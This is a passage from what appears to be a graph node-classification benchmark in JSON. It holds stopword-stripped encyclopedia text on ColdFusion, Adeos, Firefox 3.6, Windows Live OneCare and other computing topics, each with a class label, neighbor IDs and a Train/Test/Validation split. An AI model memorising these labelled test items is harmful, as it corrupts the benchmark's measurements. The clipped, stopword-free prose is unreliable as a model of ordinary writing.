coldfusion applications several tools available primarily adobe dreamweaver cs4 macromedia homesite 5.x cfeclipse eclipse others tag updaters available applications update support new coldfusion 8 features coldfusion 9 codenamed centaur released october 5 2009 new features cf9 include coldfusion 10 codenamed zeus released may 15 2012 new improved features available editions standard enterprise developer include limited additional new improved features coldfusion enterprise developer editions include limited lists obtained adobe web site pages describing new features listed first links following list cf10 originally referred codename zeus first confirmed coming adobe adobe max 2010 much prerelease period also commonly referred coldfusion next coldfusion x blogs twitter etc. adobe finally confirmed would coldfusion 10 much 2010 coldfusion product manager adam lehman toured us setting countless meetings customers developers user groups formulate master blueprint next feature set september 2010 presented plans adobe given full support approval upper management first public beta coldfusion 10 released via adobe labs 17 february 2012 coldfusion 11 codenamed splendor released april 29 2014 new improved features available editions standard enterprise developer include coldfusion 11 also removed many features previously identified simply deprecated longer supported earlier releases example cflog tag long offered date time attributes deprecated redundant date time always logged cf11 use would cause cflog tag fail adobe coldfusion 2016 release codenamed raijin also known generically coldfusion 2016 released february 16 2016 new improved features available editions standard enterprise developer include adobe coldfusion 2018 release known generically coldfusion 2018 released july 12 2018 coldfusion 2018 codenamed aether prerelease new improved features available editions standard enterprise developer include august 13 2012 adobe announced new roadmap coldfusion including code names splendor thunder dazzle next two release versions adobe announced new features coldfusion including limited mobile streamlined mobile application development revamped new pdf functionalities enabling enterprise easily integrate social media streams enterprise mobility support responsive multi screen content digital marketing – web mobile social analytics customizable enterprise video portal adobe also announced roadmap upcoming cloud enhancements roadmap projects coldfusion development year 2021 coldfusion generate pdf documents using standard html i.e additional coding needed generate documents print cfml authors place html css within pair cfdocument tags new coldfusion 11 cfhtmltopdf tags generated document either saved disk sent client browser coldfusion 8 introduced also cfpdf tag allow control pdf documents including pdf forms merging pdfs tags however use adobe pdf engine cfdocument uses combination commercial jpedal java pdf library free open source java library itext cfhtmltopdf uses embedded webkit implementation coldfusion originally object-oriented programming language like php versions 3 coldfusion falls category oo languages support multiple inheritance along java smalltalk etc. mx release 6+ coldfusion introduced basic oo functionality component language construct resembles classes oo languages component may contain number properties methods one component may also extend another inheritance components support single inheritance object handling feature set performance enhancing occurred subsequent releases release coldfusion 8 java-style interfaces supported coldfusion components use file extension cfc differentiate coldfusion templates .cfm component methods may made available web services additional coding configuration required method access declared 'remote coldfusion automatically generates wsdl url component manner nowiki http //path/to/components/component.cfc wsdl /nowiki aside soap services offered flash remoting binary format methods declared remote may also invoked via http get post request consider get request shown br invoke component search function passing query strict arguments type invocation well-suited ajax-enabled applications coldfusion 8 introduced ability serialize coldfusion data structures json consumption client coldfusion server automatically generate documentation component navigate url insert appropriate code within component declarations application component introspection available developers coldfusion components access component documentation requires password developer view documentation components known coldfusion server navigating coldfusion url interface resembles javadoc html documentation java classes coldfusion provides several ways implement custom markup language tags i.e included core coldfusion language especially useful providing familiar interface web designers content authors familiar html imperative programming traditional common way using cfml standard cfml page interpreted tag tag name corresponding file name prefixed cf_ example file imap.cfm used tag cf_imap attributes used within tag available attributes scope tag implementation page cfml pages accessible directory calling page via special directory coldfusion web application via cfimport tag calling page latter method necessarily require cf_ prefix tag name second way developments cfx tags using java c++ cfx tags prefixed cfx_ example cfx_imap tags added coldfusion runtime environment using coldfusion administrator jar dll files registered custom tags finally coldfusion supports jsp tag libraries jsp 2.0 language specification jsp tags included cfml pages using cfimport tag standard coldfusion installation allows deployment coldfusion war file ear file deployment standalone application servers macromedia jrun ibm websphere coldfusion also deployed servlet containers apache tomcat mortbay jetty platforms officially support coldfusion leave many features inaccessible coldfusion 10 macromedia jrun replaced apache tomcat coldfusion java ee application coldfusion code mixed java classes create variety applications use existing java libraries coldfusion access underlying java classes supports jsp custom tag libraries access jsp functions retrieving jsp page context getpagecontext prior coldfusion 7.0.1 coldfusion components could used java .net declaring web services however beginning coldfusion mx 7.0.1 coldfusion components used directly within java classes using cfcproxy class recently much interest java development using alternate languages jython groovy jruby coldfusion one first scripting platforms allow style java development coldfusion 8 natively supports .net within cfml syntax coldfusion developers simply call .net assembly without needing recompile alter assemblies way data types automatically translated coldfusion .net example .net datatable → coldfusion query unique feature java ee vendor coldfusion 8 offers ability access .net assemblies remotely proxy without use .net remoting allows coldfusion users leverage .net without installed windows operating system acronym coldfusion markup language cfml coldfusion templates saved disk traditionally given extension .cfm .cfml .cfc extension used coldfusion components original extension dbm dbml stood database markup language talking coldfusion users use acronym cf used numerous coldfusion resources user groups cfugs sites cfmx common abbreviation coldfusion versions 6 7 a.k.a coldfusion mx coldfusion originated proprietary technology based web technology industry standards however becoming less closed technology availability competing products alternative products include alphabetical order argument made coldfusion even less platform-bound raw java ee .net simply coldfusion run top .net app server new atlanta top servlet container java ee application server jrun websphere jboss geronimo tomcat resin server jetty web server etc. theory coldfusion application could moved unchanged java ee application server .net application server march 2013 known issue affecting coldfusion 8 9 10 left national vulnerability database open attack vulnerability identified patch released adobe cf9 cf10 january april 2013 coldfusion vulnerability blamed linode intrusion linode manager control panel website security bulletin hotfix issued adobe week earlier may 2013 adobe identified another critical vulnerability reportedly already exploited wild targets recent versions coldfusion servers web-based administrator api locked vulnerability allows unauthorized users upload malicious scripts potentially gain full control server security bulletin hotfix issued adobe 6 days later april 2015 reported cross-site scripting xss vulnerability adobe coldfusion 10 update 16 coldfusion 11 update 5 allowed remote attackers inject arbitrary web script html however exploitable users authenticated administration panel",
    "neighbors": [
      9217,
      519,
      2576,
      11291,
      8739,
      5677,
      4658,
      9780,
      575,
      8262,
      595,
      84,
      102,
      10854,
      7274,
      9834,
      11371,
      628,
      5255,
      6797,
      148,
      8854,
      6819,
      8883,
      9909,
      7862,
      190,
      5314,
      7364,
      9926,
      6860,
      8408,
      6385,
      10994,
      10486,
      9467,
      1802,
      10510,
      5395,
      1812,
      6941,
      10526,
      8994,
      10020,
      7983,
      7987,
      823,
      3895,
      2880,
      11259,
      1353,
      6993,
      1363,
      2901,
      4439,
      6493,
      865,
      7022,
      10097,
      3966,
      1920,
      2946,
      4485,
      3462,
      8070,
      9097,
      3469,
      9614,
      9618,
      2456,
      4507,
      4512,
      929,
      11693,
      4529,
      8627,
      8628,
      5048,
      9144,
      6074,
      10683,
      5567,
      9665,
      9666,
      8644,
      11219,
      4056,
      3545,
      4057,
      479,
      11237,
      487,
      4074,
      5612,
      8691,
      3573,
      502,
      7669,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5049,
    "label": 3,
    "text": "Adaptive_Domain_Environment_for_Operating_Systems:adaptive domain environment operating systems adeos adaptive domain environment operating systems nanokernel hardware abstraction layer hal hypervisor operates computer hardware operating system runs distinct nanokernels low level layer outer kernel instead intended run several kernels together makes similar virtualization technologies adeos provides flexible environment sharing hardware resources among multiple operating systems among multiple instances single os thereby enabling multiple prioritized domains exist simultaneously hardware adeos successfully inserted beneath linux kernel opening range possibilities smp clustering efficient virtualization patchless kernel debugging real-time systems linux unusually among hals adeos loaded linux loadable kernel module allow another os run along fact adeos developed context rtai real-time application interface modularize separate hal real-time kernel two categories existing solutions enable multiple operating systems run system first simulation-based provides virtual environment run additional operating systems second suggests usage nanokernel layer enable hardware sharing simulation category tools vmware plex86 virtualpc simos also kvm similar adeos rt requires specific virtualization hardware support solutions used users desire run applications foreign base os provide control whatsoever base os user simulation never meant used production environment nanokernel category tools space cache kernel exokernel suggest building miniature hardware management facilities thereafter used build production operating systems problem approach address issue currently existing operating systems user base adeos addresses requirements categories application providing simple layer inserted unmodified running os thereafter provides required primitives mechanisms allow multiple oses share hardware environment adeos attempt impose restrictions hardware ’ usage different oses necessary adeos ’ operation instead actual restriction imposed system administrator system programmer exposes system mismanagement idea behind adeos give back control system administrators programmers adeos implements queue signals time peripheral sends signal different operating systems running machine awakened turn must decide accept handle ignore discard terminate signal signals handled discarded os passed next os chain signals terminated propagated latter stages adeos ensure equal trusted access hardware takes control hardware commands issued different oses also must intrude much different oses ’ normal behavior os encompassed domain total control domain may include private address space software abstractions process virtual memory file-systems etc adeos attempt impose policy usage hardware except needed survival task determining policy left system architect adeos uses interrupt pipe propagate interrupts different domains running hardware domains may prefer first receive hardware interrupts adeos provides mechanism domains access priority interrupt dispatching effect adeos places requesting domain interrupt handler accompanying tables may called interrupt mechanism space terminology first stages interrupt pipeline domains control whether accept ignore discard terminate interrupts different effect controlled differently accepting interrupts normal state domain interrupt mechanism adeos encounters domain accepting interrupts summons interrupt handler set required cpu environment stack content interrupt handler operate correctly os may decide operate number operations including task scheduling os done pipeline proceeds planned propagating interrupts pipeline os domain want interrupted reason asks adeos stall stage domain occupies interrupt pipeline interrupts go pipeline stalled stage occupied domain os done wanting uninterrupted asks adeos install pipeline thereafter interrupts stalled corresponding stage follow route stages pipeline domain discarding interrupts interrupt passes stage occupied domain continues onto stages domain terminates interrupts interrupts terminated propagated latter stages interrupt discarding termination possible os domain recognizes adeos since oses recognize adeos possible create domain serves handler os hence interrupt pipeline stage always precedes handled domain stage may take actions domain adeos order provide handled domain os illusion normal system operation adeos done traversing pipeline checks domains dormant case calls idle task task remains active occurrence next interrupt domains n't dormant restores processor state prior interrupt entering pipeline execution continues left since adeos much hardware dependent many details specific one particular implementations general-purpose operating system resource sharing one main objectives adeos provide environment enables multiple general purpose oses share hardware developing oses usually complicated process sometimes requires extra hardware in-circuit emulators probe hardware os running using adeos os development eased since undesired behavior may controlled appropriate domain handler also provide default domain handler os development developers may controlled direct access hardware meant control adeos kernel-module development domain handlers may developed independently adeos adeos provides way kernel debuggers probers take control linux without modifying linux adeos domains facilities would load normal kernel modules would thereafter request ring-zero domain adeos done may request priority interrupt dispatching interrupt pipeline hence linux gets handle interrupts able intercept interrupts carry requested debugging tasks also extended performance profilers development tools",
    "neighbors": [
      5378,
      6150,
      6153,
      2058,
      3082,
      7561,
      4238,
      8466,
      7187,
      6300,
      2212,
      6438,
      295,
      10537,
      11180,
      7983,
      7349,
      7733,
      823,
      9525,
      9655,
      10809,
      2236,
      10813,
      318,
      5697,
      5702,
      2761,
      9931,
      7248,
      1362,
      7507,
      4695,
      5976,
      9176,
      2910,
      1513,
      6128,
      10482,
      5363,
      11123,
      8439,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 5050,
    "label": 4,
    "text": "NeDi:nedi nedi open source software tool discovers maps inventories network devices tracks connected end-nodes contains lot features user-friendly gui managing enterprise networks example mac address mapping/tracking traffic error graphing uptime monitoring correlate collected syslog trap messages customizable notification drawing network maps extensive reporting features device software poe usage disabled interfaces link errors switch usage many modular architecture allows simple integration tools example cacti graphs created purely based discovered information due nedi versatility things like printer resources monitored well development started 2001 paul scherrer institute remo rickli released public gpl2 2003 next decade nedi grew reasonable network management suite help community partners 2014 remo rickli founded nedi consulting providing commercial support development around nedi since major update released every year e.g 1.5 2015 access latest version bought support yearly subscription basis last year version released public gpl3 premium modules included free community edition",
    "neighbors": [
      8582,
      3462
    ],
    "mask": "Test"
  },
  {
    "node_id": 5051,
    "label": 1,
    "text": "IBM_BLU_Acceleration:ibm blu acceleration ibm blu acceleration collection technologies ibm research development labs analytical database workloads blu acceleration integrates number different technologies including in-memory processing columnar data actionable compression uses approximate huffman encoding compress pack data tightly cpu acceleration exploits simd technology provides parallel vector processing data skipping allows data use current active workload ignored term ‘ blu ’ stand anything particular however indirect play ibm traditional corporate nickname big blue ten ibm research development facilities around world filed 25 patents working blink ultra project resulted blu acceleration blu acceleration require indexes aggregates tuning blu acceleration integrated version 10.5 ibm db2 linux unix windows db2 luw uses storage memory constructs i.e. storage groups table spaces buffer pools sql language interfaces administration tools traditional db2 luw databases blu acceleration available ibm power x86 processor architectures blu acceleration second generation technology originated blink project started ibm almaden research center 2006 aimed primarily read-mostly business intelligence bi query processing blink combined scale-out multi-core processors dynamic random-access memory dram store copy data mart completely memory also used proprietary compression techniques algorithms allowed sql queries performed directly compressed data opposed requiring data decompressed processing could take place eventually blink incorporated two ibm products ibm smart analytics optimizer db2 z/os mainframe version db2 released november 2010 informix warehouse accelerator released march 2011 blu acceleration optimized accessing data ram however even data size grows extent longer fits ram intermediate results may spill disk blu acceleration perfected integrated db2 collaboration db2 product development ibm systems optimization competency center ibm research—this collaboration resulted addition columnar processing broader sql support i/o cpu efficiencies integration db2 sql compiler query optimizer storage layer four main advances part blu acceleration design blu acceleration optimized accessing data ram however even data size grows extent longer fits ram intermediate results may spill disk order-preserving frequency-based compression referred actionable compression blu acceleration allows wide variety comparative operations performed without decompression—and efficient use cpu memory cache registers actionable compression values appear frequently compressed higher level values appear less often actionable compression uses entropy encoding algorithm lossless data compression developed david a. huffman ph.d. student mit base offset coding another compression optimization technique used blu acceleration offset coding useful numeric data instead trying compress values 100 101 102 103 example db2 store single value 100 offsets value 1 2 3 etc. similar way db2 compresses index record ids rids —one three autonomic index compression algorithms db2 dynamically apply indexes blu acceleration values compressed order preserved means compared compressed.this allows common comparisons sql predicates performed encoded values without needing decompress data thereby accelerating evaluations reducing memory requirements lowering processing needs queries runtime. encoded data packed tightly possible collection bits equal register width cpu server used results fewer i/os data smaller better memory utilization data stored memory fewer cpu cycles data register aligned data skipping enables db2 detect ranges column values needed satisfy query avoid reading pages containing values disk data skipping utilizes secondary object called synopsis table tiny column-organized table created maintained automatically blu acceleration keeps metadata describes minimum maximum range data values chunks data 1,000 records table metadata automatically maintained insert update delete operations allows db2 blu acceleration automatically detect large sections data needed query processing effectively ignore conceptually blu acceleration ‘ data skipping similar zone map technology found puredata system analytics family however unlike zone maps metadata stored synopsis table ‘ tied particular page extent boundary―instead ‘ tied specific chunk data records data skipping deliver order magnitude savings across compute resources cpu ram i/o blu acceleration takes advantage single instruction multiple data simd processing available hardware used exploiting simd instructions low-level specific cpu instructions blu acceleration perform operation multiple points data simultaneously consequently db2 blu acceleration use single simd instruction get results multiple data elements example perform equality predicate processing —provided register db2 also put 128 bits simd register evaluate data single instruction level performance achieved ultimately determined hardware resources blu acceleration work said even server ‘ simd enabled blu acceleration emulate simd hardware smid software using bitmasking achieve parallelism deliver benefits simd offer addition blu acceleration engineered majority memory access occurs cpu cache accessing data ram operating almost exclusively data cpu cache ram blu acceleration minimizes latency able keep cpus busy designed process data substantially larger memory in-memory speeds blu acceleration prefetches streams data processing engine—advancing beyond system memory in-cpu memory optimization uses specialized in-memory optimized columnar prefetching algorithm determine milliseconds advance data loaded ram every algorithm designed minimize access ram maximize processing time l3 l2 caches order magnitude faster ram.",
    "neighbors": [
      1801,
      10505,
      1037,
      11024,
      3219,
      8340,
      4630,
      2456,
      10137,
      4255,
      9634,
      2089,
      4781,
      10413,
      10675,
      9911,
      6850,
      2901,
      7767,
      2775,
      2780,
      734,
      3045,
      10734,
      499,
      8052,
      6775,
      2168,
      1146
    ],
    "mask": "None"
  },
  {
    "node_id": 5052,
    "label": 4,
    "text": "Dialed_Number_Identification_Service:dialed number identification service dialed number identification service dnis service sold telecommunications companies corporate clients identifies originally dialed telephone number inbound call client may use information call routing internal destinations activation special call handling dnis service telephone company sends sequence typically four ten digits call setup direct inward dial service also provides dnis example company may different toll-free telephone number product line sells multilingual customer support call center handling calls multiple product lines corporate telephone system receives call analyzes dnis signaling may play appropriate recorded greeting interactive voice response ivr systems dnis used routing information dispatching purposes determine script service activated based number dialed reach ivr platform dnis commonly provided 800 900 services",
    "neighbors": [
      8192,
      11170
    ],
    "mask": "Test"
  },
  {
    "node_id": 5053,
    "label": 9,
    "text": "Domain-specific_entertainment_language:domain-specific entertainment language domain-specific entertainment languages group domain-specific languages used describe computer games environments potentially used entertainment video music",
    "neighbors": [
      7144,
      11227,
      9926
    ],
    "mask": "Test"
  },
  {
    "node_id": 5054,
    "label": 5,
    "text": "Firefox_3.6:firefox 3.6 mozilla firefox 3.6 version firefox web browser released january 2010 release main improvement firefox 3.5 improved performance due speed improvements tracemonkey javascript engine uses gecko 1.9.2 engine compared 1.9.1 ff 3.5 improves compliance web standards codenamed namoroka version support x bitmap images dropped release marked beginning new development cycle firefox well receiving major updates browser also received minor updates new features allow users receive new features quickly dawn new roadmap reflected changes superseded firefox 4 released next year although ff 3.6 prolonged period use version 4 noted user interface changes firefox 3.6 last major version official firefox release run powerpc-based macintoshes see tenfourfox much-more-recent version firefox powerpc-based computers running mac os x soon 4 much less weight given major version numbers 6 numbers used september year 4 5 6 7 8 9 compared 3 nearly decade firefox development 1 2 3 firefox versions 4 9 reached end-of-life status mozilla continued supporting firefox 3.6 security updates coinciding proposal cater enterprise users optional extended support releases beginning 2012 based upon firefox 10 mozilla discontinued support firefox 3.6 april 24 2012 automatic update firefox 12 pushed compatible devices june 2012 development version started december 1 2008 first alpha version 3.6 released august 7 2009 first beta version released october 30 followed beta 2 november 10 beta 3 november 17 beta 4 november 26 beta 5 december 17 release candidate 1 released january 8 2010 followed release candidate 2 january 17 final version released january 21 2010 firefox 3.6.2 released march 23 2010 followed version 3.6.3 april 1 closed bugs aslr dep handling found pwn2own contest 2010 firefox developers created new feature called lorentz named lorentz national park preview version lorentz firefox 3.6.3plugin1 made available april 8 2010 betas firefox 3.6.4 made available starting april 20 2010 firefox 3.6.4 released june 22 2010 windows linux versions incorporate out-of-process plug-ins oopp isolates execution plug-ins adobe flash apple quicktime microsoft silverlight default separate process significantly reduces number firefox crashes experienced users watching online videos playing games user simply refresh page continue mozilla states 30 browser crashes caused third-party plugins support plug-ins default oopp mac os x platform become available firefox 4 firefox 3.6.6 lengthens amount time plug-in allowed unresponsive point plug-in quits firefox 3.6.7 security stability update fixed several issues firefox 3.6.8 security update released mere three days 3.6.7 fix another security fault firefox 3.6.9 addition fixing security stability issues introduced support codice_1 http response header help prevent clickjacking firefox 3.6.10 security stability update fixed several issues firefox 3.6.11 security stability update fixed several issues firefox 3.6.12 security update fixed critical security issue firefox 3.6.13 security stability update fixed several issues firefox 3.6.14 security stability update fixed several issues firefox 3.6.15 stability update fixed java applets issue firefox 3.6.16 security update blacklisted invalid https certificates firefox 3.6.17 security stability update fixed several issues firefox 3.6.18 security stability update fixed several issues firefox 3.6.19 stability update fixed several issues firefox 3.6.20 security stability update fixed several issues firefox 3.6.21 security update blacklisted compromised https certificate firefox 3.6.22 security update revoked ssl certificates staten der nederlanden due fraudulent ssl certificate issuance well fixing error .gov.uk domain names firefox 3.6.23 security stability update fixed several issues firefox 3.6.24 security stability update fixed several issues firefox 3.6.25 security stability update fixed several issues firefox 3.6.26 security stability update fixed several issues firefox 3.6.27 security update fixed several issues firefox 3.6.28 security stability update fixed several issues new features firefox 3.6 include mozilla discontinued support firefox 3.6 april 24 2012 27 months support made longest supported version firefox even longer firefox 2 26 months total support underlying gecko 1.9.2 engine continued used updates camino",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      2095,
      4661,
      3639,
      5176,
      9275,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      6747,
      11363,
      1642,
      9834,
      10860,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9908,
      7861,
      11449,
      4797,
      7364,
      11466,
      7885,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      7943,
      1295,
      1807,
      7951,
      2836,
      3350,
      10006,
      7965,
      1834,
      7983,
      11060,
      823,
      10057,
      10060,
      2893,
      10078,
      11112,
      8557,
      7543,
      3961,
      6528,
      3971,
      7044,
      3462,
      8584,
      6028,
      7572,
      5026,
      10174,
      9152,
      4048,
      5078,
      482,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      6133,
      5114,
      8700,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 5055,
    "label": 4,
    "text": "Generally_Accepted_Privacy_Principles:generally accepted privacy principles generally accepted privacy principles gapp framework intended assist chartered accountants certified public accountants creating effective privacy program managing preventing privacy risks framework developed joint consultation canadian institute chartered accountants cica american institute certified public accountants aicpa aicpa/cica privacy task force gapp framework previously known aicpa/cica privacy framework founded single privacy principle personally identifiable information must collected used retained disclosed compliance commitments entity privacy notice criteria set gapp issued aicpa/cica privacy objective supported ten main principles seventy objectives associated measurable criteria privacy defined generally accepted privacy principles rights obligations individuals organizations respect collection use retention disclosure disposal personal information",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5056,
    "label": 3,
    "text": "National_Interop:national interop national interop systems integration company earliest experience radio ip technologies deployed public safety communications company founded public safety personnel one principals company testified u.s. senate 2007 applicability radio ip roip alternative expensive statewide interoperable radio systems proposed funding federal government costs us 1b per state company designed implemented roip-powered system air evac lifeteam spanning 14 states 80+ radio towers 24x7 9-1-1 type dispatch center well numerous smaller roip systems national interop works roip technologies may best suited particular public safety application",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5057,
    "label": 4,
    "text": "Windows_Live_OneCare:windows live onecare windows live onecare previously windows onecare live codenamed a1 computer security performance enhancement service developed microsoft windows core technology onecare multi-platform rav reliable anti-virus microsoft purchased gecad software srl 2003 subsequently discontinued software available annual paid subscription could used three computers 18 november 2008 microsoft announced windows live onecare would discontinued 30 june 2009 instead offering users new free anti-malware suite called microsoft security essentials available however virus definitions support onecare would continue subscription expires end-of-life announcement microsoft noted windows live onecare would upgraded work windows 7 would also work windows xp mode windows live onecare entered beta state summer 2005 managed beta program launched public beta located betaplace microsoft former beta delivery system 31 may 2006 windows live onecare made official debut retail stores united states beta version windows live onecare 1.5 released early october 2006 microsoft version 1.5 released manufacturing 3 january 2007 made available public 30 january 2007 4 july 2007 beta testing started version 2.0 final version released 16 november 2007 microsoft acquired komoku 20 march 2008 merged computer security software windows live onecare windows live onecare 2.5 build 2.5.2900.28 final released 3 july 2008 day microsoft also released windows live onecare server 2.5 windows live onecare features integrated anti-virus personal firewall backup utilities tune-up utility integrated functionality windows defender malware protection future addition registry cleaner considered added significant customer advantages functionality version 2 added features multi-pc home network management printer sharing support start-time optimizer proactive fixes recommendations monthly reports centralized backup online photo backup windows live onecare built ease-of-use designed home users onecare also attempts minimal interface lessen user confusion resource use adds icon notification area tells user glance status system health using three alert colors green good yellow fair red risk version 1.5 onecare compatible 32 bit versions windows xp windows vista version 2 onecare supports 64 bit compatibility vista version 2.5 microsoft released windows live onecare server supports windows server 2008 standard 64-bit windows small business server 2008 standard premium editions edition onecare operates safe mode windows live onecare support windows 7 development discontinued replaced microsoft security essentials windows live onecare requires users activate product wish continue using free trial period 90 days valid windows live id product activated grey message bar top program disappears subscription remains active 1 year date activation windows live onecare require operating system checked windows genuine advantage windows live onecare protection plus security component onecare suite consists three parts windows live onecare 1.5 onwards also monitors internet explorer 7 8 security settings ensures automatic website checking feature phishing filter enabled windows live onecare performance plus component performs monthly pc tune-up related tasks windows live onecare backup restore component aids backing important files files backed various recordable media external hard disks cds dvds restoring files entirety subset also restored networked computer long running onecare well backup restore component supports backup software features incremental backups scheduling windows live onecare criticized users competing security software companies microsoft acquisition gecad rav core technology onecare subsequent discontinuation product deprived gnu/linux platform others one leading virus scanning tools e-mail servers bringing microsoft ultimate intentions question 26 january 2006 windows live onecare criticized foundstone division competing mcafee anti-virus integrated firewall default white lists allow java applications digitally signed software bypass user warnings since neither applications carry assurances security flaws written malicious intent microsoft since responded criticism justifying decision java applications widely used third party applications popular trusted program among users highly unusual malware signed windows live onecare also criticized lack adherence industry firewall standards concerning intrusion detection tests conducted agnitum developers outpost firewall shown onecare failing detect trojans malware hijack applications already resident infected machine february 2007 first windows vista anti-virus product testing virus bulletin magazine sister company sophos developers sophos anti-virus found windows live onecare failed detect 18.6 viruses fifteen anti-virus products tested pass virus bulletin vb100 test anti-virus product detect 100 viruses av-comparatives also released results placed windows live onecare last testing seventeen anti-virus products response jimmy kuo microsoft security research response msrr team pledged add truly important actively spread malware soon possible test detection numbers get better better malware par majors arena also expressed confidence improvements soon majors need catch us april 2008 windows live onecare passed vb100 test windows vista sp1 business edition august 2008 windows live onecare placed 14th 16 anti-virus products on-demand virus detection rates hand may 2009 windows live onecare placed 2nd proactive/retrospective performance test conducted av-comparatives av-comparatives.org test issuer denotes false alarms good achievement publisher also points false positives cause much harm genuine infections furthermore anti-virus scanners prone false alarms essentially achieve higher detection scores",
    "neighbors": [
      2049,
      2563,
      537,
      7713,
      550,
      10790,
      5673,
      8753,
      2046,
      569,
      5178,
      9279,
      2118,
      10828,
      4704,
      8816,
      10872,
      6797,
      1172,
      10392,
      2213,
      5799,
      3243,
      1708,
      704,
      10433,
      2244,
      4814,
      9423,
      10451,
      6364,
      5860,
      10986,
      10987,
      5356,
      8943,
      9971,
      1273,
      254,
      9983,
      1792,
      5380,
      2309,
      3342,
      9496,
      6431,
      10531,
      5924,
      8998,
      3885,
      7983,
      7473,
      823,
      11577,
      9025,
      1858,
      11073,
      4421,
      10574,
      9048,
      4953,
      2907,
      7515,
      3935,
      9055,
      3942,
      4480,
      4994,
      1417,
      2443,
      6028,
      3482,
      1436,
      4511,
      7121,
      10708,
      4568,
      5082,
      9695,
      11248,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 5058,
    "label": 3,
    "text": "Macintosh_II_family:macintosh ii family macintosh ii family personal computers designed manufactured sold apple computer inc. 1987 1993 macintosh ii initial model representing high-end macintosh line time course next six years seven models produced culminating short-lived macintosh iivi macintosh iivx models apple retired macintosh ii name moved motorola 68040 processors centris quadra names used instead unlike prior macintosh models all-in-one designs macintosh ii models modular systems include built-in monitors expandable beginning macintosh ii culminating macintosh iifx macintosh ii family apple high-end line 1987 introduction motorola 68040-based macintosh quadra computers 1991 expansion provided way nubus become standard expansion bus entire macintosh line almost decade macintosh ii first support color displays first apart macintosh xl support screen resolution larger 512x384 macintosh ii also first use motorola 68000 series processor motorola 68000 except original macintosh ii launched line motorola 68020 clocked 16 mhz exclusively used motorola 68030 microprocessor even motorola 68040 introduced apple would eventually adopt '040 introduction quadra 700 900 positioning models high-end workstation-class machines graphics scientific computing positioning macintosh ii family mainstream desktop computer macintosh ii series lifespan rose become among powerful personal computers available macintosh ii series replaced macintosh centris quadra macintosh lc performa families continued use ii 68030 technology long 68040 introduced powerbook continued use '030 power macintosh era",
    "neighbors": [
      9732,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      7269,
      8806,
      6258,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      2735,
      11447,
      4283,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      10481,
      1290,
      3338,
      781,
      4879,
      784,
      6419,
      8480,
      10023,
      4910,
      4399,
      11066,
      9022,
      1346,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      10691,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 5059,
    "label": 9,
    "text": "Local_variable:local variable computer science local variable variable given local scope local variable references function block declared override variable name larger scope programming languages two levels visibility local variables contrasted global variables hand many algol-derived languages allow number nested levels visibility private variables functions constants types hidden within either nested blocks nested functions local variables fundamental procedural programming generally modular programming variables local scope used avoid issues side-effects occur global variables local variables may lexical dynamic scope though lexical static scoping far common lexical scoping lexical scope also called static scoping static scope variable name scope certain block scope program text block definition within block text variable name exists bound variable value outside block text variable name exist contrast dynamic scoping dynamic scope variable name scope certain block scope block functions transitively called block except overridden another declaration block ends variable name exist languages like perl common lisp allow programmer choose static dynamic scoping defining redefining variable examples languages use dynamic scoping include logo emacs lisp shell languages bash dash mirbsd korn shell mksh local declaration languages provide lexically scoped local variables languages local variables automatic variables stored call stack directly means recursive function calls local variables instance function given distinct addresses hence variables scope declared written read without risk side-effects functions outside block declared programming languages employ call value semantics provide called subroutine local copy arguments passed languages local parameters treated local variables within subroutine contrast call reference call name semantics allow parameters act aliases values passed arguments allowing subroutine modify variables outside scope special type local variable called static local available many mainstream languages including c/c++ visual basic vb.net allows value retained one call function another – static variable local scope case recursive calls function also access single statically allocated variable languages static variables declared special storage class keyword e.g. codice_1 static locals global functions lifetime static global variables value remains memory life program function scope global scope automatic local variables distinct usages codice_1 keyword several different meanings various languages perl supports dynamic lexically-scoped local variables keyword codice_3 used define local dynamically-scoped variables codice_4 used local lexically-scoped variables since dynamic scoping less common today perl documentation warns codice_3 n't people think “ local ” instead codice_3 keyword gives temporary dynamically-scoped value global package variable lasts end enclosing block however variable visible function called within block create lexically-scoped local variables use codice_4 operator instead understand works consider following code output happens since global variable modified new temporary local meaning inside global value restored upon leaving scope using codice_4 case instead codice_3 would printed 1 three times since case codice_10 variable would limited static scope function seen randal l. schwartz tom phoenix argue operator codice_3 different name like codice_12 ruby language inspired also perl case notation made simpler global variable name must preceded sign like codice_13 local variable simply sign front name like codice_14 perl scalar values front note ruby provides built-in support statically-scoped local variables like perl codice_4 dynamically-scoped local variables like perl codice_3 least one library ruby provides dynamically-scoped variables",
    "neighbors": [
      512,
      1152,
      2048,
      2817,
      3462,
      8582,
      8587,
      2062,
      655,
      10510,
      7445,
      2327,
      2204,
      797,
      9245,
      3871,
      5537,
      4777,
      5165,
      5040,
      10555,
      2620,
      6717,
      3904,
      6594,
      2627,
      8644,
      2501,
      8262,
      10571,
      6349,
      847,
      10584,
      10075,
      7398,
      6633,
      7147,
      8822,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5060,
    "label": 4,
